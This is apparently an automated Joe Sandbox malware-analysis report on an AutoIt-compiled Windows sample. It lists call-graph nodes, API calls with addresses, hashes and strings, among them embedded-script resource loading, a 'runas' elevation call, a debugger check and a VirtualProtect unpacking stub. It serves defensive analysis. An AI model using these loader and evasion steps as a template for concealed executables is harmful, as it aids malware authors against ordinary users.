95696->95698 95736 de37c6 95696->95736 95700 de37ce 95697->95700 95701 e51e00 95697->95701 95702 de382c PostQuitMessage 95698->95702 95703 de3776 95698->95703 95699 de37ab NtdllDefWindowProc_W 95729 de37b9 95699->95729 95704 de37f6 SetTimer RegisterClipboardFormatW 95700->95704 95705 de37d3 95700->95705 95750 de2ff6 16 API calls 95701->95750 95702->95729 95707 e51e88 95703->95707 95708 de3781 95703->95708 95712 de381f CreatePopupMenu 95704->95712 95704->95729 95709 de37da KillTimer 95705->95709 95710 e51da3 95705->95710 95765 e24ddd 60 API calls _memset 95707->95765 95713 de3789 95708->95713 95714 de3836 95708->95714 95747 de3847 Shell_NotifyIconW _memset 95709->95747 95716 e51ddc MoveWindow 95710->95716 95717 e51da8 95710->95717 95711 e51e27 95751 dfe312 335 API calls Mailbox 95711->95751 95712->95729 95720 e51e6d 95713->95720 95721 de3794 95713->95721 95740 dfeb83 95714->95740 95716->95729 95723 e51dac 95717->95723 95724 e51dcb SetFocus 95717->95724 95720->95699 95764 e1a5f3 48 API calls 95720->95764 95726 de379f 95721->95726 95727 e51e58 95721->95727 95723->95726 95730 e51db5 95723->95730 95724->95729 95725 de37ed 95748 de390f DeleteObject DestroyWindow Mailbox 95725->95748 95726->95699 95752 de3847 Shell_NotifyIconW _memset 95726->95752 95763 e255bd 70 API calls _memset 95727->95763 95728 e51e9a 95728->95699 95728->95729 95749 de2ff6 16 API calls 95730->95749 95735 e51e68 95735->95729 95736->95699 95738 e51e4c 95753 de4ffc 95738->95753 95741 dfec1c 95740->95741 95742 dfeb9a _memset 95740->95742 95741->95729 95766 de51af 95742->95766 95744 dfec05 KillTimer SetTimer 95744->95741 95745 e53c7a Shell_NotifyIconW 95745->95744 95746 dfebc1 95746->95744 95746->95745 95747->95725 95748->95729 95749->95729 95750->95711 95751->95726 95752->95738 95754 de5027 _memset 95753->95754 95788 de4c30 95754->95788 95758 de50ca Shell_NotifyIconW 95761 de51af 50 API calls 95758->95761 95759 e53d28 Shell_NotifyIconW 95760 de50ac 95760->95758 95760->95759 95762 de50df 95761->95762 
95762->95736 95763->95735 95764->95736 95765->95728 95767 de51cb 95766->95767 95787 de52a2 Mailbox 95766->95787 95768 de6b0f 48 API calls 95767->95768 95769 de51d9 95768->95769 95770 e53ca1 LoadStringW 95769->95770 95771 de51e6 95769->95771 95774 e53cbb 95770->95774 95772 de6a63 48 API calls 95771->95772 95773 de51fb 95772->95773 95773->95774 95775 de520c 95773->95775 95776 de510d 48 API calls 95774->95776 95777 de5216 95775->95777 95778 de52a7 95775->95778 95781 e53cc5 95776->95781 95780 de510d 48 API calls 95777->95780 95779 de6eed 48 API calls 95778->95779 95784 de5220 _memset _wcscpy 95779->95784 95780->95784 95782 de518c 48 API calls 95781->95782 95781->95784 95783 e53ce7 95782->95783 95786 de518c 48 API calls 95783->95786 95785 de5288 Shell_NotifyIconW 95784->95785 95785->95787 95786->95784 95787->95746 95789 e53c33 95788->95789 95790 de4c44 95788->95790 95789->95790 95791 e53c3c DestroyCursor 95789->95791 95790->95760 95792 e25819 61 API calls _W_store_winword 95790->95792 95791->95790 95792->95760 95793 e58eb8 95797 e2a635 95793->95797 95795 e58ec3 95796 e2a635 84 API calls 95795->95796 95796->95795 95799 e2a642 95797->95799 95804 e2a66f 95797->95804 95798 e2a671 95809 dfec4e 81 API calls 95798->95809 95799->95798 95801 e2a676 95799->95801 95799->95804 95806 e2a669 95799->95806 95802 de936c 81 API calls 95801->95802 95803 e2a67d 95802->95803 95805 de510d 48 API calls 95803->95805 95804->95795 95805->95804 95808 df4525 61 API calls ___crtGetEnvironmentStringsW 95806->95808 95808->95804 95809->95801 95810 e05dfd 95811 e05e09 _flsall 95810->95811 95847 e07eeb GetStartupInfoW 95811->95847 95813 e05e0e 95849 e09ca7 GetProcessHeap 95813->95849 95815 e05e66 95816 e05e71 95815->95816 95934 e05f4d 47 API calls 3 library calls 95815->95934 95850 e07b47 95816->95850 95819 e05e77 95820 e05e82 __RTC_Initialize 95819->95820 95935 e05f4d 47 API calls 3 library calls 95819->95935 95871 e0acb3 95820->95871 95823 e05e91 95824 e05e9d GetCommandLineW 95823->95824 95936 e05f4d 
47 API calls 3 library calls 95823->95936 95890 e12e7d GetEnvironmentStringsW 95824->95890 95827 e05e9c 95827->95824 95831 e05ec2 95903 e12cb4 95831->95903 95834 e05ec8 95835 e05ed3 95834->95835 95938 e0115b 47 API calls 3 library calls 95834->95938 95917 e01195 95835->95917 95838 e05edb 95839 e05ee6 __wwincmdln 95838->95839 95939 e0115b 47 API calls 3 library calls 95838->95939 95921 de3a0f 95839->95921 95848 e07f01 95847->95848 95848->95813 95849->95815 95942 e0123a 30 API calls 2 library calls 95850->95942 95852 e07b4c 95943 e07e23 InitializeCriticalSectionAndSpinCount 95852->95943 95854 e07b51 95855 e07b55 95854->95855 95945 e07e6d TlsAlloc 95854->95945 95944 e07bbd 50 API calls 2 library calls 95855->95944 95858 e07b67 95858->95855 95860 e07b72 95858->95860 95859 e07b5a 95859->95819 95946 e06986 95860->95946 95863 e07bb4 95954 e07bbd 50 API calls 2 library calls 95863->95954 95866 e07b93 95866->95863 95868 e07b99 95866->95868 95867 e07bb9 95867->95819 95953 e07a94 47 API calls 4 library calls 95868->95953 95870 e07ba1 GetCurrentThreadId 95870->95819 95872 e0acbf _flsall 95871->95872 95873 e07cf4 __lock 47 API calls 95872->95873 95874 e0acc6 95873->95874 95875 e06986 __calloc_crt 47 API calls 95874->95875 95876 e0acd7 95875->95876 95877 e0ad42 GetStartupInfoW 95876->95877 95878 e0ace2 _flsall @_EH4_CallFilterFunc@8 95876->95878 95885 e0ae80 95877->95885 95887 e0ad57 95877->95887 95878->95823 95879 e0af44 95963 e0af58 RtlLeaveCriticalSection _doexit 95879->95963 95881 e0aec9 GetStdHandle 95881->95885 95882 e06986 __calloc_crt 47 API calls 95882->95887 95883 e0aedb GetFileType 95883->95885 95884 e0ada5 95884->95885 95888 e0ade5 InitializeCriticalSectionAndSpinCount 95884->95888 95889 e0add7 GetFileType 95884->95889 95885->95879 95885->95881 95885->95883 95886 e0af08 InitializeCriticalSectionAndSpinCount 95885->95886 95886->95885 95887->95882 95887->95884 95887->95885 95888->95884 95889->95884 95889->95888 95891 e05ead 95890->95891 95893 e12e8e 95890->95893 95897 
e12a7b GetModuleFileNameW 95891->95897 95892 e12ea9 95964 e069d0 47 API calls _W_store_winword 95892->95964 95893->95892 95893->95893 95895 e12eb4 ___crtGetEnvironmentStringsW 95896 e12eca FreeEnvironmentStringsW 95895->95896 95896->95891 95898 e12aaf _wparse_cmdline 95897->95898 95899 e05eb7 95898->95899 95900 e12ae9 95898->95900 95899->95831 95937 e0115b 47 API calls 3 library calls 95899->95937 95965 e069d0 47 API calls _W_store_winword 95900->95965 95902 e12aef _wparse_cmdline 95902->95899 95904 e12ccd __wsetenvp 95903->95904 95908 e12cc5 95903->95908 95905 e06986 __calloc_crt 47 API calls 95904->95905 95913 e12cf6 __wsetenvp 95905->95913 95906 e12d4d 95907 e01c9d _free 47 API calls 95906->95907 95907->95908 95908->95834 95909 e06986 __calloc_crt 47 API calls 95909->95913 95910 e12d72 95912 e01c9d _free 47 API calls 95910->95912 95912->95908 95913->95906 95913->95908 95913->95909 95913->95910 95914 e12d89 95913->95914 95966 e12567 47 API calls 2 library calls 95913->95966 95967 e06e20 IsProcessorFeaturePresent 95914->95967 95916 e12d95 95916->95834 95918 e011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95917->95918 95920 e011e0 __IsNonwritableInCurrentImage 95918->95920 95982 e00f0a 52 API calls __cinit 95918->95982 95920->95838 95922 e51ebf 95921->95922 95923 de3a29 95921->95923 95924 de3a63 745AC8D0 95923->95924 95983 e01405 95924->95983 95928 de3a8f 95995 de3adb SystemParametersInfoW SystemParametersInfoW 95928->95995 95930 de3a9b 95996 de3d19 95930->95996 95934->95816 95935->95820 95936->95827 95942->95852 95943->95854 95944->95859 95945->95858 95948 e0698d 95946->95948 95949 e069ca 95948->95949 95950 e069ab Sleep 95948->95950 95955 e130aa 95948->95955 95949->95863 95952 e07ec9 TlsSetValue 95949->95952 95951 e069c2 95950->95951 95951->95948 95951->95949 95952->95866 95953->95870 95954->95867 95956 e130b5 95955->95956 95960 e130d0 __calloc_impl 95955->95960 95957 e130c1 95956->95957 95956->95960 95962 e07c0e 47 API calls 

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 42286fb1bf94380c0b4d3057d0aaf3cc0e07868f06a45710823760d72839c9af
                                                                                                                  • Instruction ID: c8e4f060709372751573a05a4ed987cb8d0506946349d80a8c15c3262ea7c0bf
                                                                                                                  • Opcode Fuzzy Hash: 42286fb1bf94380c0b4d3057d0aaf3cc0e07868f06a45710823760d72839c9af
                                                                                                                  • Instruction Fuzzy Hash: A5325775A022288FCB248F15DC81AEAB7B5FB4A314F5851D9E40AF7A91D7309EC0CF52

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00DE3AA3,?), ref: 00DE3D45
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00DE3AA3,?), ref: 00DE3D57
                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EA1148,00EA1130,?,?,?,?,00DE3AA3,?), ref: 00DE3DC8
                                                                                                                    • Part of subcall function 00DE6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DE3DEE,00EA1148,?,?,?,?,?,00DE3AA3,?), ref: 00DE6471
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00DE3AA3,?), ref: 00DE3E48
                                                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E928F4,00000010), ref: 00E51CCE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00EA1148,?,?,?,?,?,00DE3AA3,?), ref: 00E51D06
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E7DAB4,00EA1148,?,?,?,?,?,00DE3AA3,?), ref: 00E51D89
                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00DE3AA3), ref: 00E51D90
                                                                                                                    • Part of subcall function 00DE3E6E: GetSysColorBrush.USER32(0000000F), ref: 00DE3E79
                                                                                                                    • Part of subcall function 00DE3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00DE3E88
                                                                                                                    • Part of subcall function 00DE3E6E: LoadIconW.USER32(00000063), ref: 00DE3E9E
                                                                                                                    • Part of subcall function 00DE3E6E: LoadIconW.USER32(000000A4), ref: 00DE3EB0
                                                                                                                    • Part of subcall function 00DE3E6E: LoadIconW.USER32(000000A2), ref: 00DE3EC2
                                                                                                                    • Part of subcall function 00DE3E6E: RegisterClassExW.USER32(?), ref: 00DE3F30
                                                                                                                    • Part of subcall function 00DE36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DE36E6
                                                                                                                    • Part of subcall function 00DE36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DE3707
                                                                                                                    • Part of subcall function 00DE36B8: ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE371B
                                                                                                                    • Part of subcall function 00DE36B8: ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE3724
                                                                                                                    • Part of subcall function 00DE4FFC: _memset.LIBCMT ref: 00DE5022
                                                                                                                    • Part of subcall function 00DE4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DE50CB
                                                                                                                  Strings
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                  • String ID: ()$This is a third-party compiled AutoIt script.$runas
                                                                                                                  • API String ID: 438480954-3074634049
                                                                                                                  • Opcode ID: 911101bfa99a4a2c1694aaa81c53650571cf18c18bd1acecc32fedfae19b3832
                                                                                                                  • Instruction ID: 40fc8519e98e315818f8d54dffcf88788bc1f35f6b46e15e5d0277b6d96d67ac
                                                                                                                  • Opcode Fuzzy Hash: 911101bfa99a4a2c1694aaa81c53650571cf18c18bd1acecc32fedfae19b3832
                                                                                                                  • Instruction Fuzzy Hash: 44511730E09288AECF11BBB3EC45EFE7B75DF5AB84F0051A8F65177192CA6056498731

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00DE37B3
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00DE37DD
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DE3800
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DE380B
                                                                                                                  • CreatePopupMenu.USER32 ref: 00DE381F
                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00DE382E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                  • String ID: TaskbarCreated
                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                  • Opcode ID: 96fd05fc108684e8bbe16000bdfcc9c5dbc47fd892a5c6a3622139f642ab8414
                                                                                                                  • Instruction ID: a35c6b2d462a0838468e0599d86d7f0081799bf7deb268e59bc5bd667b9b4e26
                                                                                                                  • Opcode Fuzzy Hash: 96fd05fc108684e8bbe16000bdfcc9c5dbc47fd892a5c6a3622139f642ab8414
                                                                                                                  • Instruction Fuzzy Hash: 594155F52082D5AFDB107B2BEC8EB7A3A95FB4A341F041159F912B31A1CB60EE448771

Control-flow Graph

Function at 0x00DFDDC0 (graph rendering and executed/not-executed colouring omitted): the entry block calls GetVersionExW, later blocks call GetCurrentProcess, then GetNativeSystemInfo or GetSystemInfo, and FreeLibrary on the way out; call sites are listed under APIs below.
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00DFDDEC
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00E7DC38,?,?), ref: 00DFDEAC
                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00E7DC38,?,?), ref: 00DFDF01
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DFDF0C
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DFDF1F
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E7DC38,?,?), ref: 00DFDF29
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E7DC38,?,?), ref: 00DFDF35
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3851250370-0
                                                                                                                  • Opcode ID: cc1fb47e2eaf1faf64252d5a754d951f2dd8d7a1651bc2aa15e1652d92b400e5
                                                                                                                  • Instruction ID: 3a56e55b312e44b841065a484545354c692dc031028b907e455ba8ccb438a52e
                                                                                                                  • Opcode Fuzzy Hash: cc1fb47e2eaf1faf64252d5a754d951f2dd8d7a1651bc2aa15e1652d92b400e5
                                                                                                                  • Instruction Fuzzy Hash: 9C61A57190A3C8CFCF15CF6498C15E97F76AF2A304B1A89D9D985AF207C624C509CB76

Control-flow Graph

Function at 0x00DE406B (graph rendering and executed/not-executed colouring omitted): a linear chain CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource and a final copy block at 0x00E54F50, where every failed step branches to the common exit at 0x00DE40A2; call sites are listed under APIs below.
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DE407B
                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DE449E,?,?,00000000,00000001), ref: 00DE4092
                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00DE449E,?,?,00000000,00000001,?,?,?,?,?,?,00DE41FB), ref: 00E54F1A
                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00DE449E,?,?,00000000,00000001,?,?,?,?,?,?,00DE41FB), ref: 00E54F2F
                                                                                                                  • LockResource.KERNEL32(00DE449E,?,?,00DE449E,?,?,00000000,00000001,?,?,?,?,?,?,00DE41FB,00000000), ref: 00E54F42
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                  • String ID: SCRIPT
                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                  • Opcode ID: 9226d3a255ec2f148542bb595c1b01ea5211ef256513eebd93cad56097b03a05
                                                                                                                  • Instruction ID: de31eb6dbfa9c8d695e580270f94f6c79ac8427ad494e18fe0a834e9b5a7cea5
                                                                                                                  • Opcode Fuzzy Hash: 9226d3a255ec2f148542bb595c1b01ea5211ef256513eebd93cad56097b03a05
                                                                                                                  • Instruction Fuzzy Hash: 48115A70604741BFE7219B66EC48F277BB9EBC5B51F14416CF602A62A0DAB1DC049A30
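The APIs recorded for the function at 0x00DE406B form the sequence FindResourceExW(hModule, 0x0000000A, "SCRIPT", 0), i.e. type RT_RCDATA and language "any", then LoadResource, SizeofResource and LockResource, with the bytes copied into the stream created by CreateStreamOnHGlobal. That is how AutoIt-compiled executables load their embedded script: it lives in an RCDATA resource named SCRIPT. The Python below is an added illustration, not code from the Joe Sandbox report, the sample or AutoIt; it performs the same lookup statically on the file so the blob can be pulled out for analysis without executing the sample. The PE it parses in the demo is constructed inline (a minimal PE32 with a single .rsrc section); its layout, the payload bytes and the function names are assumptions.

```python
# Added illustration (not from the report or the sample): static RT_RCDATA/"SCRIPT" lookup
# mirroring FindResourceExW -> LoadResource -> SizeofResource -> LockResource on disk.
import struct
from typing import Optional

RT_RCDATA = 10  # the 0x0000000A type argument seen in the recorded FindResourceExW call

def _rva_to_offset(data: bytes, rva: int) -> int:
    """Map a relative virtual address to a file offset through the section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    first_section = e_lfanew + 24 + opt_size
    for i in range(num_sections):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, first_section + 40 * i + 8)
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            return rva - vaddr + rawptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")

def _read_dir(data: bytes, rsrc_base: int, dir_off: int):
    """Yield (key, offset) for one IMAGE_RESOURCE_DIRECTORY level: key is an int for ID entries
    or a str for named entries; offset keeps its high bit when it points at a subdirectory."""
    n_named, n_id = struct.unpack_from("<HH", data, rsrc_base + dir_off + 12)
    for i in range(n_named + n_id):
        name, off = struct.unpack_from("<II", data, rsrc_base + dir_off + 16 + 8 * i)
        if name & 0x80000000:  # IMAGE_RESOURCE_DIR_STRING_U: u16 length, then UTF-16LE chars
            so = rsrc_base + (name & 0x7FFFFFFF)
            length = struct.unpack_from("<H", data, so)[0]
            yield data[so + 2:so + 2 + 2 * length].decode("utf-16-le"), off
        else:
            yield name, off

def _match(key, wanted) -> bool:
    """Resource names compare case-insensitively, as FindResourceExW does; IDs compare as ints."""
    if isinstance(key, str) and isinstance(wanted, str):
        return key.upper() == wanted.upper()
    return key == wanted

def find_resource(data: bytes, res_type, res_name) -> Optional[bytes]:
    """Bytes of the first language variant of (res_type, res_name), or None if absent.
    Taking the first language entry mirrors the wLanguage = 0 argument in the recorded call."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    dd_start = 96 if magic == 0x10B else 112  # data directories start later in a PE32+ header
    rsrc_rva = struct.unpack_from("<I", data, e_lfanew + 24 + dd_start + 8 * 2)[0]  # entry 2 = resources
    if rsrc_rva == 0:
        return None
    rsrc_base = _rva_to_offset(data, rsrc_rva)
    for key, off in _read_dir(data, rsrc_base, 0):
        if not _match(key, res_type):
            continue
        for key2, off2 in _read_dir(data, rsrc_base, off & 0x7FFFFFFF):
            if not _match(key2, res_name):
                continue
            for _lang, off3 in _read_dir(data, rsrc_base, off2 & 0x7FFFFFFF):
                data_rva, size = struct.unpack_from("<II", data, rsrc_base + (off3 & 0x7FFFFFFF))
                start = _rva_to_offset(data, data_rva)
                return bytes(data[start:start + size])
    return None

def extract_script_resource(data: bytes) -> Optional[bytes]:
    """The RT_RCDATA/"SCRIPT" blob an AutoIt-compiled executable carries, or None."""
    return find_resource(data, RT_RCDATA, "SCRIPT")

def build_test_pe(payload: bytes) -> bytes:
    """Constructed test input: a minimal PE32 whose only section, .rsrc, holds RT_RCDATA/"SCRIPT"."""
    rsrc_rva, raw_ptr = 0x1000, 0x200

    def directory(n_named: int, n_id: int) -> bytes:
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)

    # Offsets inside .rsrc: 0x00 root, 0x18 type dir, 0x30 name dir, 0x48 data entry,
    # 0x58 the name string, 0x68 the payload. High bit set = offset of a subdirectory.
    rsrc = directory(0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 0x18)
    rsrc += directory(1, 0) + struct.pack("<II", 0x80000000 | 0x58, 0x80000000 | 0x30)
    rsrc += directory(0, 1) + struct.pack("<II", 0x0409, 0x48)
    rsrc += struct.pack("<IIII", rsrc_rva + 0x68, len(payload), 0, 0)
    rsrc += struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le")
    rsrc += b"\0" * (0x68 - len(rsrc)) + payload

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)      # i386, 1 section, PE32 optional header
    opt = struct.pack("<H", 0x10B) + b"\0" * 110                        # magic, padding up to data directory 2
    opt += struct.pack("<II", rsrc_rva, len(rsrc)) + b"\0" * (0xE0 - 120)
    sect = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, len(rsrc), raw_ptr, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + opt + sect
    return headers + b"\0" * (raw_ptr - len(headers)) + rsrc

if __name__ == "__main__":
    print(extract_script_resource(build_test_pe(b"constructed stand-in for the AutoIt script blob")))
```

On a real file, `extract_script_resource(open(path, "rb").read())` returns the raw resource bytes; for an AutoIt binary that is the compressed script container, which still needs an AutoIt-specific decompressor before it is readable. The lookup stops at the first language entry under the name, which is the behaviour the recorded call with wLanguage 0 relies on.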
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00F030CA
                                                                                                                  • GetProcAddress.KERNEL32(?,00EFBFF9), ref: 00F030E8
                                                                                                                  • ExitProcess.KERNEL32(?,00EFBFF9), ref: 00F030F9
                                                                                                                  • VirtualProtect.KERNELBASE(00DE0000,00001000,00000004,?,00000000), ref: 00F03147
                                                                                                                  • VirtualProtect.KERNELBASE(00DE0000,00001000), ref: 00F0315C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996367037-0
                                                                                                                  • Opcode ID: ff8fe61fb8099d3ab10884ec023bd6888ed0855fc32f54f031a77223337ee297
                                                                                                                  • Instruction ID: 24f3f6457a8b095784c44411749c37ab7f452af677c3554f97c7aec18dc07daa
                                                                                                                  • Opcode Fuzzy Hash: ff8fe61fb8099d3ab10884ec023bd6888ed0855fc32f54f031a77223337ee297
                                                                                                                  • Instruction Fuzzy Hash: 3C514872F453524BD7209AB8CCC4770BBA8EB453757280739D5E2C73C5EBA45A05B7A0
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,I/), ref: 00E26CB9
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00E26CCA
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E26CDA
                                                                                                                  Memory Dump Source
